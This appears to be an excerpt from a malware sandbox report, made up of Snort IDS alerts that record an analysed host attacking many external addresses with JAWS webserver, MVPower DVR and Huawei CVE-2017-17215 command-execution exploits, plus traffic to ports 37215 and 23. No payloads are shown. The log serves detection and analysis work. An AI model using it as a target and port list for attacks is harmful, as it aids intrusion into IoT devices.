              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56304 -> 23.198.222.192:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37694 -> 85.221.227.124:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46628 -> 172.245.174.80:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57882 -> 50.19.25.188:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50126 -> 37.32.125.61:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58488 -> 89.116.58.162:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48736 -> 193.233.164.237:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40724 -> 23.77.132.177:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56304 -> 23.198.222.192:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37694 -> 85.221.227.124:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50126 -> 37.32.125.61:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58488 -> 89.116.58.162:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40724 -> 23.77.132.177:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47340 -> 186.132.17.223:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35930 -> 106.14.41.174:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36660 -> 91.242.215.204:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45228 -> 103.204.176.205:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47340 -> 186.132.17.223:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35930 -> 106.14.41.174:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36660 -> 91.242.215.204:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55282 -> 69.80.206.87:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41366 -> 201.229.167.159:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60268 -> 82.165.119.133:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59548 -> 91.200.67.110:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45228 -> 103.204.176.205:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34468 -> 213.29.227.250:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58798 -> 54.199.121.170:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56372 -> 185.110.26.82:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55282 -> 69.80.206.87:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41366 -> 201.229.167.159:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60268 -> 82.165.119.133:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59548 -> 91.200.67.110:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46528 -> 103.141.149.90:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58798 -> 54.199.121.170:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56372 -> 185.110.26.82:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34468 -> 213.29.227.250:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46528 -> 103.141.149.90:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46902 -> 205.164.12.222:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60554 -> 94.237.51.52:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32958 -> 2.136.180.91:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46902 -> 205.164.12.222:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60554 -> 94.237.51.52:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32958 -> 2.136.180.91:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44040 -> 13.249.87.54:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33056 -> 167.73.14.88:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49862 -> 104.230.152.225:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37480 -> 50.87.38.17:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43978 -> 20.72.240.212:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33828 -> 212.109.194.43:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37480 -> 50.87.38.17:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47210 -> 218.35.171.230:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54220 -> 173.224.201.175:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49862 -> 104.230.152.225:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43978 -> 20.72.240.212:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46658 -> 199.232.239.48:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38188 -> 170.61.215.224:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54220 -> 173.224.201.175:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37476 -> 82.163.53.15:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46658 -> 199.232.239.48:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51516 -> 217.160.215.205:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58620 -> 212.40.8.187:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45582 -> 142.58.40.154:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54798 -> 71.80.219.15:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52998 -> 54.150.52.140:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45770 -> 185.204.186.162:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33828 -> 212.109.194.43:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59160 -> 85.50.165.37:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51852 -> 23.231.150.128:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44126 -> 18.167.130.64:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47210 -> 218.35.171.230:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42208 -> 46.101.108.165:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54798 -> 71.80.219.15:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41088 -> 87.123.31.165:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40470 -> 202.238.204.210:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37476 -> 82.163.53.15:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36010 -> 104.113.198.158:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51516 -> 217.160.215.205:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58620 -> 212.40.8.187:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52998 -> 54.150.52.140:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45770 -> 185.204.186.162:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38786 -> 18.142.2.159:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59160 -> 85.50.165.37:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48988 -> 2.182.153.62:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42208 -> 46.101.108.165:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41088 -> 87.123.31.165:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51852 -> 23.231.150.128:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44126 -> 18.167.130.64:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40470 -> 202.238.204.210:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36010 -> 104.113.198.158:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44040 -> 13.249.87.54:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38786 -> 18.142.2.159:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48988 -> 2.182.153.62:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35444 -> 45.63.78.70:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49976 -> 104.230.152.225:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35444 -> 45.63.78.70:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51014 -> 172.121.20.145:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49976 -> 104.230.152.225:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51014 -> 172.121.20.145:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59060 -> 23.231.34.90:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48982 -> 205.186.128.8:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59862 -> 34.216.109.8:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59060 -> 23.231.34.90:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38972 -> 34.107.164.60:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36874 -> 147.161.173.4:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48036 -> 191.82.53.43:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37718 -> 157.70.251.23:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60866 -> 70.121.13.4:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46464 -> 167.82.120.66:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44734 -> 59.49.86.225:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48982 -> 205.186.128.8:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38972 -> 34.107.164.60:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59862 -> 34.216.109.8:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60866 -> 70.121.13.4:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46464 -> 167.82.120.66:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36874 -> 147.161.173.4:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44720 -> 94.250.243.6:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55428 -> 91.146.142.151:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48036 -> 191.82.53.43:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58860 -> 8.134.23.43:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38508 -> 156.254.103.55:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38508 -> 156.254.103.55:37215
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42602 -> 198.44.248.104:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44734 -> 59.49.86.225:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44720 -> 94.250.243.6:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55428 -> 91.146.142.151:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58860 -> 8.134.23.43:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42602 -> 198.44.248.104:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50982 -> 144.126.206.157:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40796 -> 86.181.28.252:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50982 -> 144.126.206.157:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40796 -> 86.181.28.252:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53078 -> 104.69.218.34:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50120 -> 104.230.152.225:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35348 -> 75.187.170.240:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58122 -> 198.204.78.115:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58690 -> 104.21.5.88:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49236 -> 172.67.227.6:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53078 -> 104.69.218.34:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40430 -> 38.173.201.91:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47396 -> 34.18.64.54:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60562 -> 27.54.141.224:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50120 -> 104.230.152.225:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53436 -> 103.50.160.139:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35348 -> 75.187.170.240:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58690 -> 104.21.5.88:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49236 -> 172.67.227.6:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54834 -> 123.1.253.236:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43476 -> 168.93.163.146:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40430 -> 38.173.201.91:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48824 -> 35.211.249.211:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53882 -> 23.37.171.104:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51782 -> 106.15.76.48:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40344 -> 20.70.223.64:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43476 -> 168.93.163.146:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58056 -> 118.99.59.249:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48824 -> 35.211.249.211:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47396 -> 34.18.64.54:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60562 -> 27.54.141.224:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43216 -> 52.66.124.196:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53882 -> 23.37.171.104:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53436 -> 103.50.160.139:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33286 -> 202.75.103.117:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51782 -> 106.15.76.48:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40344 -> 20.70.223.64:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58056 -> 118.99.59.249:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43216 -> 52.66.124.196:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33286 -> 202.75.103.117:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60854 -> 23.209.26.229:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41464 -> 117.20.101.125:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43368 -> 47.96.31.60:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60854 -> 23.209.26.229:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41464 -> 117.20.101.125:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58566 -> 138.118.173.132:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50398 -> 61.220.62.145:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43368 -> 47.96.31.60:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60496 -> 155.159.137.8:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58566 -> 138.118.173.132:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50398 -> 61.220.62.145:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60496 -> 155.159.137.8:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44830 -> 23.218.15.43:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40366 -> 104.25.137.95:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57290 -> 146.126.59.113:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49620 -> 51.17.132.47:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44830 -> 23.218.15.43:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53884 -> 156.235.102.234:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53884 -> 156.235.102.234:37215
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40366 -> 104.25.137.95:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56304 -> 20.44.122.130:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50988 -> 176.119.158.219:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49620 -> 51.17.132.47:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56304 -> 20.44.122.130:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51600 -> 185.2.14.12:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50988 -> 176.119.158.219:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51600 -> 185.2.14.12:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36246 -> 142.93.144.234:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52038 -> 44.237.242.202:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36246 -> 142.93.144.234:80
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51912
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51964
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51986
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52002
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52014
              Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52046
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52178
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52218
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
